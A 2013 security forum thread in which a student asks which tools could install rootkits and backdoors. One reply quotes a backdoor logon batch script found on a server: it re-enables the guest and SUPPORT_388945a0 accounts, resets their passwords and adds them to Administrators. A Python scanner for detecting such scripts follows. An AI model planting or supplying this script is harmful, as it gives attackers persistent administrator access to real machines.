
Query on possible hacking tools


sheepboi

Newbie

Posts: 1

Joined: Thu Apr 25, 2013 2:08 pm

Post Thu Apr 25, 2013 2:17 pm

Query on possible hacking tools

Hi, I am new to the forum and relatively new to security. I have to write a paper on an attack that affected a business not too long ago and I need a little bit of help.

As I am not very familiar with hacking tools and exploits used by cyber-criminals, I need guidance on what tools could have been utilized to cause the following:

- Alter system tools to hide presence on network (rootkit),
- Create a backdoor Trojan as a means of accessing a network.

I know of a few such as Armitage and Metasploit, but as they are pretty comprehensive, I haven't been able to find information that would indicate they could do these things.

Any direction would be brilliant!

Thanks guys.

Triban


Hero Member

Posts: 620

Joined: Fri Feb 19, 2010 4:17 pm

Post Thu Apr 25, 2013 5:36 pm

Re: Query on possible hacking tools

It is a very general question, and doing a Google search for "rootkits backdoor trojan" might send you in the right direction. Metasploit could be a good resource, but you need to know how to work your way through it. Also, what type of rootkit? Master boot record? The rootkit is typically used for persistence, as it tends to sit below where traditional AV looks. It will continue to replace live malware if someone removes it and reboots the device. There are other uses for rootkits, but they depend on what the attacker wants to accomplish. The key to backdoors is the ability for the attacker to continually connect. So, lots to consider.
Certs: GCWN
(@)Dewser

Krotch


Newbie

Posts: 1

Joined: Wed Sep 17, 2008 4:05 pm

Post Mon Apr 29, 2013 5:07 am

Re: Query on possible hacking tools

Well, the last "backdoor" that I removed from a server was actually pretty simple. It was a batch file that had a hidden name and a hidden file extension. It was pretty invisible to casual searching. It was set as a logon script. Basically, it referenced copies of some of the Windows utilities that were renamed and located in system32\drivers\etc.

The script went like this:

@cd %systemroot%\system32\drivers\etc\
@1 localgroup "Remote Desktop Users" SUPPORT_388945a0 /add
@1 localgroup "Remote Desktop Users" guest /add
@1 user guest QQqqaa123321
@1 user guest QQqqaa123321 /add
@1 localgroup administrators guest /add
@1 user guest /active:yes
@1 user SUPPORT_388945a0 QQqqaa123321
@1 user SUPPORT_388945a0 QQqqaa123321 /add
@1 localgroup administrators SUPPORT_388945a0 /add
@1 user SUPPORT_388945a0 /active:yes


Pretty basic, but it did the job of reactivating the accounts and resetting the passwords. Slipped by the AV pretty easily.
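A defender-side check for the kind of logon script Krotch describes, added here as an example and not code from this thread: it scans a batch script for commands that run a renamed program out of drivers\etc, enable or reset the built-in guest and SUPPORT_388945a0 accounts, or add accounts to the Administrators or Remote Desktop Users groups. The sample script, the command name "1" and the password are constructed for the example.

```python
import re

# Constructed sample, adapted from the logon script quoted in the post above.
# "1" is the renamed copy of a Windows utility; the password is made up.
SAMPLE_SCRIPT = r"""@cd %systemroot%\system32\drivers\etc\
@1 localgroup "Remote Desktop Users" SUPPORT_388945a0 /add
@1 user guest ExamplePass123
@1 localgroup administrators guest /add
@1 user guest /active:yes
@1 user SUPPORT_388945a0 /active:yes
"""

# Built-in accounts and groups a logon script has no business touching.
BUILTIN_ACCOUNTS = {"guest", "support_388945a0"}
PRIVILEGED_GROUPS = {"administrators", "remote desktop users"}
KNOWN_COMMANDS = {"cd", "net", "echo", "rem", "exit", "set", "if", "goto"}
DATA_ONLY_DIR = r"\system32\drivers\etc"   # hosts/services live here, never executables


def scan_logon_script(text):
    """Return [(line_no, reason), ...] for suspicious lines of a batch logon script."""
    findings = []
    in_data_dir = False
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip().lstrip("@")          # a leading "@" only suppresses echo
        if not line:
            continue
        cmd, _, rest = line.partition(" ")
        cmd = cmd.lower()
        # keep quoted group names such as "Remote Desktop Users" as one token
        args = [t.strip('"').lower() for t in re.findall(r'"[^"]*"|\S+', rest)]
        if cmd == "cd" and DATA_ONLY_DIR in rest.lower():
            in_data_dir = True
            findings.append((n, "changes into drivers\\etc, a data-only directory"))
        elif cmd not in KNOWN_COMMANDS:
            where = "out of drivers\\etc" if in_data_dir else "by an unusual name"
            findings.append((n, f"runs unknown program '{cmd}' {where}"))
        # net.exe-style arguments, whatever the binary was renamed to
        if len(args) >= 3 and args[0] == "user" and args[1] in BUILTIN_ACCOUNTS:
            if "/active:yes" in args:
                findings.append((n, f"enables built-in account {args[1]}"))
            elif not args[2].startswith("/"):
                findings.append((n, f"resets password of built-in account {args[1]}"))
        if len(args) >= 3 and args[0] == "localgroup" and args[1] in PRIVILEGED_GROUPS:
            if "/add" in args:
                findings.append((n, f"adds {args[2]} to {args[1]}"))
    return findings
```

Run it over the logon scripts collected from a host (or from the domain's NETLOGON share) and review every line it reports; a legitimate logon script rarely touches local accounts at all.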
